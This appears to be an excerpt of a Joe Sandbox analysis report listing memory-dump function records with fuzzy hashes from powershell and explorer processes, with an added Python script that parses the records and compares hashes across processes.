                                                                          • Opcode ID: 7875aa702c0fbcd54d6589789ff2a470f8a8f304ebbeb8ef174bdadefe0f017e
                                                                          • Instruction ID: efa3f31e29830d23b9db226cf3d155da60e7b231dc67ef12b46d4b9750c47513
                                                                          • Opcode Fuzzy Hash: 7875aa702c0fbcd54d6589789ff2a470f8a8f304ebbeb8ef174bdadefe0f017e
                                                                          • Instruction Fuzzy Hash: 71F04C36A0BE8C5FD741DF1CD8654E47FA0FF65201B0501BBD489C3071DA31590887C1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                          • API String ID: 0-1415242001
                                                                          • Opcode ID: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                                          • Instruction ID: e7c9e3fbdb16d3d3ea5212ac3ffb3de1b4bcdf25e518ceaaa350289893b59a2e
                                                                          • Opcode Fuzzy Hash: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                                          • Instruction Fuzzy Hash: E72107B37045258AC30A37ADBC559ED7780DF5437834551F3E228CF153EF24A48B8A80
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f8d48ea091e4c4e30752d6c7d70dd965521aa5b18b00d35193ad4f83d7ca036
                                                                          • Instruction ID: dcf4063f0b1288d70c0bb9ee123470dd2df19d2a5db4d7435a496c09e997d50c
                                                                          • Opcode Fuzzy Hash: 7f8d48ea091e4c4e30752d6c7d70dd965521aa5b18b00d35193ad4f83d7ca036
                                                                          • Instruction Fuzzy Hash: F4D19170A08A4D8FDF99DF5CD464AA97BE1FF58300F15426AD41DD72A5CA34E881CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 360e57a0acb61434a5d62957e9ab671263cc3dd6a318132bdbc40c9b112cc35d
                                                                          • Instruction ID: 0c1bdf82b01d7af9485d26fe1fa5b17359ac13cd16edd74fbcdf0b5a876b998b
                                                                          • Opcode Fuzzy Hash: 360e57a0acb61434a5d62957e9ab671263cc3dd6a318132bdbc40c9b112cc35d
                                                                          • Instruction Fuzzy Hash: 47D14532B1FBCE1FEBA59BA858645B57BA0EF16314B0901FED85CCB0E3D918A805C341
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 872633fa9dad6a6c9ca5e193f8ebc8b45806fec390ea1c8e3b0b16f0be6c15ab
                                                                          • Instruction ID: 7aed7e35a7e4705e393321447c597f47601d768b20cdbcad6405c8dd1f502bfc
                                                                          • Opcode Fuzzy Hash: 872633fa9dad6a6c9ca5e193f8ebc8b45806fec390ea1c8e3b0b16f0be6c15ab
                                                                          • Instruction Fuzzy Hash: 2E715063B0BEA94BE716A7ACEC7A0D53B50EF15768B0901F3C5E88B0A3FD2425574781
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c1853b752e819dd64852c90ebfbb190139b00d85ee96fbf4ce177455a133458
                                                                          • Instruction ID: 5b79c32fd8b1b4f53b7a092c2f8ba90bf31bcd7d7f79bcf3ecf16a68bdf81f64
                                                                          • Opcode Fuzzy Hash: 9c1853b752e819dd64852c90ebfbb190139b00d85ee96fbf4ce177455a133458
                                                                          • Instruction Fuzzy Hash: 79515932B5EA4A1FE7E9CAAC542267477D1EFA5220F1A40BEC45DC72EBDE14EC058341
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 38a81f4293bed55d2ac31f2c33bef67476abed940422e82ac74fee1c9c45070c
                                                                          • Instruction ID: a40e377b43d286b532e40cf16801e239874f29c09a8b0b31d25048ac5f33f140
                                                                          • Opcode Fuzzy Hash: 38a81f4293bed55d2ac31f2c33bef67476abed940422e82ac74fee1c9c45070c
                                                                          • Instruction Fuzzy Hash: 4D414C32B9EA495FEBF9DAAC54206B477D1EF44720B0900BED45DC72ABEA54FD018381
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b2009ba22308e11070482fff5a3d39fa370e5e2ed2625d2689ccd43f3d7d031
                                                                          • Instruction ID: d22e5c991f88dbf1d781ed18a438d124ee0e9c5c337f024b1369117d3b8cda78
                                                                          • Opcode Fuzzy Hash: 1b2009ba22308e11070482fff5a3d39fa370e5e2ed2625d2689ccd43f3d7d031
                                                                          • Instruction Fuzzy Hash: 27412831A0DF488FDB189F5C980A6A97BE0FB99310F10412FE45DC3292DB30A81587C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2049306001.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b76d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 35105dd4ee2ec551d32a07a966467ea9e0ccbc667f679b839bcf76b0c78bc99b
                                                                          • Instruction ID: cb0c2e8abdb927a594d62d9fe80657eb6f3ddce9f0da651ebfd11f46d5d9b8e9
                                                                          • Opcode Fuzzy Hash: 35105dd4ee2ec551d32a07a966467ea9e0ccbc667f679b839bcf76b0c78bc99b
                                                                          • Instruction Fuzzy Hash: 9941197140EBC49FE7669B289C519523FF0EF56220B1A06DFD088CB1B7D629AC45C7A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c556dd6702e6d15312cc9262af06ccd2914fa3dea1beea4cd3144e39a7911abe
                                                                          • Instruction ID: 7ecdb2ccaea3f2ffa36d84d06673aa90d19ddd956a35ff41baf256fe6d30e940
                                                                          • Opcode Fuzzy Hash: c556dd6702e6d15312cc9262af06ccd2914fa3dea1beea4cd3144e39a7911abe
                                                                          • Instruction Fuzzy Hash: 13212B3090CB4C8FDB59DFAC984A7E97FE0EB9A320F04416BD048C31A2D6749416CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eacdde5515637f9b4e245349c0883633926f6aa5edc596a3114e60905a669abe
                                                                          • Instruction ID: 17a0b951a03790d39a0c5214b00e1b4c65c0f9cbe957cc48c4c5aa6750c7a749
                                                                          • Opcode Fuzzy Hash: eacdde5515637f9b4e245349c0883633926f6aa5edc596a3114e60905a669abe
                                                                          • Instruction Fuzzy Hash: 92210822B6F94A2FE7F9CA98446227067C1EF71210B5A40BDD85DC72FACE14EC058301
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 903650dcb81dda413987301c387afa586ce11d301bde65c4344e097cbb7f4dd1
                                                                          • Instruction ID: 053e3cfe368acf34e33d18f6bb02eca1ed9c25a0df235f140b122be7ec458250
                                                                          • Opcode Fuzzy Hash: 903650dcb81dda413987301c387afa586ce11d301bde65c4344e097cbb7f4dd1
                                                                          • Instruction Fuzzy Hash: 7211E332B9F5495FE7F8DA9894706B437D0EF4032074600BAD81DC76BADA68BD018340
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b880000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^4$N_^7$N_^F$N_^J
                                                                          • API String ID: 0-3508309026
                                                                          • Opcode ID: dabbe24802d554556fd15f6229eae3468619220f0459efd10296f077a3207134
                                                                          • Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
                                                                          • Opcode Fuzzy Hash: dabbe24802d554556fd15f6229eae3468619220f0459efd10296f077a3207134
                                                                          • Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ad904b9f29996baeba2ffc51c730b2f4268d89f1e413c5e3a414a8ce2e9413ba
                                                                          • Instruction ID: 4e04b0f00f4adeaa69875debdd5c82c005d34be73621f1e5ec448620e47eb3a0
                                                                          • Opcode Fuzzy Hash: ad904b9f29996baeba2ffc51c730b2f4268d89f1e413c5e3a414a8ce2e9413ba
                                                                          • Instruction Fuzzy Hash: ECD19170A18A4D8FDF99DF58C455AA9BBE1FF68300F15416AD409D72A9CB34E881CB81
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b10e92ec02c00ae9fb563517ca087f905d58e3c90aa3bd050bd9c75c3c1dfed2
                                                                          • Instruction ID: c1c445e55b265b0c5fd38c3efb5602ac7bf2b264bf0e60cc2ab78150e87e41cd
                                                                          • Opcode Fuzzy Hash: b10e92ec02c00ae9fb563517ca087f905d58e3c90aa3bd050bd9c75c3c1dfed2
                                                                          • Instruction Fuzzy Hash: F6D15632A1EBCD1FEBA5D7A848A55B57BE1EF16310B0901FED49CC70E3DA18A905C341
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d8f049ad138d3a09c9a4931cef62e1cca07fddf407bec2cedf5cf35c117a19f
                                                                          • Instruction ID: fe843ce38d3e32de1341ad663af1e8df146ded5760a30b515f5f951b789da42e
                                                                          • Opcode Fuzzy Hash: 6d8f049ad138d3a09c9a4931cef62e1cca07fddf407bec2cedf5cf35c117a19f
                                                                          • Instruction Fuzzy Hash: 63515C32B2EA4A1FE7A9D65C54A277877D1EF65220B1A40BFC05DC72E7DE14EC058341
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c68fc20c30468e77006d1e2462ca8f2c1d2b0175785dabe3c8729b96ef178c75
                                                                          • Instruction ID: 623cd467dde9ac21d28449600ae12abb557f382f647e39e8221c8d98803a7b52
                                                                          • Opcode Fuzzy Hash: c68fc20c30468e77006d1e2462ca8f2c1d2b0175785dabe3c8729b96ef178c75
                                                                          • Instruction Fuzzy Hash: 85414732B1EA495FEBB9D66C54A06B877D1EF84720B1A00BFD05DC72E7EA14ED018381
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc6239c7782fb89e721553597930ee01850198c32dcd07d85876dca3aab672bc
                                                                          • Instruction ID: 64e6fc667e22caa96ffe71333b866261ff94590d149228a0fcf3fb1d3a314f0a
                                                                          • Opcode Fuzzy Hash: dc6239c7782fb89e721553597930ee01850198c32dcd07d85876dca3aab672bc
                                                                          • Instruction Fuzzy Hash: 73412A7190EB884FDB199F5C9C0A6A97FE0FB59310F04416FD499C3292CA74B945CBD2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2256203655.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b78d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 79000a2299ecd3d25819a7187f330d05351a1ea64b6e098a749a84098a5e7d01
                                                                          • Instruction ID: 0452b5965a7f1ed8d94cc7e1d46ba6e92f034f3ad0a6275dd938afb8fd3536c3
                                                                          • Opcode Fuzzy Hash: 79000a2299ecd3d25819a7187f330d05351a1ea64b6e098a749a84098a5e7d01
                                                                          • Instruction Fuzzy Hash: 6041247150EFC44FE7568B3998919523FF0EF56221B160ADFD088CB1B3D625A84AC7A2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 24c86f78080ca981b47ba44e12b233156706ee8736387a7bc3f80899841ea12e
                                                                          • Instruction ID: f1c36c16767f8f00ba81c134d3b49cba9b92c4353694f1ba5185d71fcd5789fd
                                                                          • Opcode Fuzzy Hash: 24c86f78080ca981b47ba44e12b233156706ee8736387a7bc3f80899841ea12e
                                                                          • Instruction Fuzzy Hash: 1921E63190CB4C4FDB59DBAC984A7E97FE0EB96321F04416BD449C3162D674A816CB92
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c064d6ee7723ad9528f691e9949650d42bfecbb9610f5d6a53dec49581671fbd
                                                                          • Instruction ID: f8c3af2ed2c2bdcaf10027ffdd9ad2d06fab54840fe53598f94c3daedf568e24
                                                                          • Opcode Fuzzy Hash: c064d6ee7723ad9528f691e9949650d42bfecbb9610f5d6a53dec49581671fbd
                                                                          • Instruction Fuzzy Hash: 4A21C422B2E98A2FE7B9EA5844A227867C1EF65210B4A40BED05DC76B3DE14EC058341
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86c3a930e507e56042750416859c87baeae5b368824a346fa306e7f59975697b
                                                                          • Instruction ID: d8699debce304b794fdc813ac6ea44084a7dd99a53847728c0d8735847e92d65
                                                                          • Opcode Fuzzy Hash: 86c3a930e507e56042750416859c87baeae5b368824a346fa306e7f59975697b
                                                                          • Instruction Fuzzy Hash: FC110232B1F5495FE7B8D65894B06B837D0FF40720B5A00BEE42DC76A3DA18BD018340
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                          • API String ID: 0-1415242001
                                                                          • Opcode ID: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                                                          • Instruction ID: e7c9e3fbdb16d3d3ea5212ac3ffb3de1b4bcdf25e518ceaaa350289893b59a2e
                                                                          • Opcode Fuzzy Hash: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                                                          • Instruction Fuzzy Hash: E72107B37045258AC30A37ADBC559ED7780DF5437834551F3E228CF153EF24A48B8A80
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1377c14cb173867a19cbe68b684984d6670fc23df7658eb70e410cd6468b3819
                                                                          • Instruction ID: 2d8da422927e2c6f1939016bad0449548228e35494089fac7dd4d39b18150c11
                                                                          • Opcode Fuzzy Hash: 1377c14cb173867a19cbe68b684984d6670fc23df7658eb70e410cd6468b3819
                                                                          • Instruction Fuzzy Hash: 1912C430B29E4A4BE7A8FB7898696B977D2FF9C304F410579E41DC32D6DE38A9418341
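The function records in this section (one "Memory Dump Source" block per recovered function, each carrying the dump name, the IDA plugin snapshot, the Similarity IDs and two fuzzy hashes) are easier to work with as structured data than as a bullet list. The Python script below is an added example, not part of the Joe Sandbox report and not Joe Security's tooling: it parses records in this listing, groups them by process, and compares Instruction Fuzzy Hashes between processes. Two things in it are assumptions of mine: that the first 8-hex-digit field of the dump name is Joe Sandbox's per-analysis process number, and the nibble-by-nibble similarity, which is a crude heuristic for spotting the same in-memory code recurring in more than one process (compare the powershell PID 9 and PID 11 entries above) and is not Joe Sandbox's own similarity metric. The embedded input is four records copied from this section, with some empty Similarity lines dropped.

```python
import re
from dataclasses import dataclass, field
from itertools import combinations

# Constructed input: four records copied from the report section above (abridged).
SAMPLE = """\
Memory Dump Source
• Source File: 00000009.00000002.2050284934.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9b880000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
• Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
Memory Dump Source
• Source File: 0000000B.00000002.2257850728.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
• Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
• Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
• Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
• String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
• Opcode ID: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
• Instruction Fuzzy Hash: E72107B37045258AC30A37ADBC559ED7780DF5437834551F3E228CF153EF24A48B8A80
Memory Dump Source
• Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
• Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
• Opcode ID: 1377c14cb173867a19cbe68b684984d6670fc23df7658eb70e410cd6468b3819
• Instruction Fuzzy Hash: 1912C430B29E4A4BE7A8FB7898696B977D2FF9C304F410579E41DC32D6DE38A9418341
"""


@dataclass
class FunctionRecord:
    """One recovered function from the report's disassembly section."""
    proc_id: int = -1       # assumed: first 8-hex-digit field of the dump name is the process number
    process: str = ""       # image name taken from the snapshot file name
    offset: int = 0         # virtual address of the dumped region
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""
    strings: list = field(default_factory=list)


SOURCE_RE = re.compile(r"Source File:\s*([0-9A-Fa-f]{8})\.[^,]*\.sdmp,\s*Offset:\s*([0-9A-Fa-f]+)")
SNAPSHOT_RE = re.compile(r"hcaresult_(\d+)_\d+_[0-9a-f]+_(\w+)\.jbxd")
FIELDS = {"Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
          "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}


def parse_records(text):
    """Turn the bullet-list report text into FunctionRecord objects."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()      # drop indentation and the bullet glyph
        if line == "Memory Dump Source":             # every record starts with this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or ":" not in line:           # "Strings", "Similarity", plugin name, ...
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m = SOURCE_RE.search(line)
            if m:
                cur.proc_id, cur.offset = int(m.group(1), 16), int(m.group(2), 16)
        elif key == "Snapshot File":
            m = SNAPSHOT_RE.search(value)
            if m:
                cur.process = m.group(2)
                if cur.proc_id < 0:                  # fall back to the snapshot's process number
                    cur.proc_id = int(m.group(1))
        elif key == "String ID":
            cur.strings = [s for s in value.split("$") if s]   # '$' separates referenced strings
        elif key in FIELDS:
            setattr(cur, FIELDS[key], value)
    return records


def by_process(records):
    """Group records by (process number, image name)."""
    groups = {}
    for r in records:
        groups.setdefault((r.proc_id, r.process), []).append(r)
    return groups


def nibble_similarity(a, b):
    """Fraction of hex digits equal at the same position. Own heuristic, not Joe
    Sandbox's similarity metric; only meaningful for hashes of equal length."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)


def cross_process_matches(records, threshold=0.75):
    """Pairs of functions from different processes whose Instruction Fuzzy
    Hashes agree in at least `threshold` of their positions."""
    out = []
    for r, s in combinations(records, 2):
        if r.proc_id == s.proc_id:
            continue
        sim = nibble_similarity(r.instruction_fuzzy, s.instruction_fuzzy)
        if sim >= threshold:
            out.append((r, s, sim))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for (pid, name), fns in by_process(recs).items():
        print(f"process {pid} ({name}): {len(fns)} function(s)")
    for r, s, sim in cross_process_matches(recs):
        print(f"{r.process}#{r.proc_id} {r.offset:#x} ~ {s.process}#{s.proc_id} {s.offset:#x}: {sim:.2f}")
```

Run on the four records, the only pair above the threshold is the powershell PID 9 and PID 11 function (56 of 70 hash positions agree). Note that an equal dump offset across processes says nothing by itself: 00007FFD9B880000 appears for both powershell PID 9 and explorer PID 13 above, and their hashes are unrelated; the hashes, not the addresses, are what to compare.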
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44f3da72df28c9a2191d3e518cae054745db3ee414b316446c45e5c9e2682c08
                                                                          • Instruction ID: 86f837338318acb8a1063ca566733b593cf9e8a1e688613401a83671836ae5b4
                                                                          • Opcode Fuzzy Hash: 44f3da72df28c9a2191d3e518cae054745db3ee414b316446c45e5c9e2682c08
